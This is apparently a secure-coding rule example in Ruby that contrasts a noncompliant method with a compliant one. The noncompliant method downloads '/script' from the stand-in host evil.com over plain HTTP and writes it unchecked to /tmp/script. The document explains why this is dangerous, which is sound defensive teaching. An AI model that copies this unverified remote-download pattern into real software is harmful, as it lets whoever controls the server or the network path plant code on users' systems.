Writing the body of an HTTP response to a local file may hide unintended functionality. The fetched content reaches the disk without being inspected, so this behavior may hide malicious code, and it introduces a new vector for attacks.
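# Noncompliant example: saves an HTTP response body straight to a local file.
#
# The body is fetched with Net::HTTP.new(host), which speaks plain HTTP unless
# use_ssl is enabled, and is written to a fixed path under /tmp with no
# integrity check. Whoever controls the server, or the network path to it,
# therefore decides what ends up on disk. In review, look for TLS and a pinned
# digest or signature check before accepting code shaped like this.
#
# @return [Integer] number of bytes written
def http_file_access_noncompliant
  resp = Net::HTTP.new("evil.com").get("/script").body
  # The block form closes the handle even if the write raises.
  File.open("/tmp/script", "w") do |file|
    # Noncompliant: Writing a file from http access.
    file.write(resp)
  end
end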
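# Compliant example: the file content is a local literal rather than data
# obtained over HTTP, so nothing remote influences what is written.
#
# @return [Integer] number of bytes written
def http_file_access_compliant
  a = "a"
  # The block form flushes and closes the handle before returning, so the
  # content is on disk as soon as the method is done.
  File.open("/tmp/script", "w") do |file|
    # Compliant: Not using any http access to write in file.
    file.write(a)
  end
end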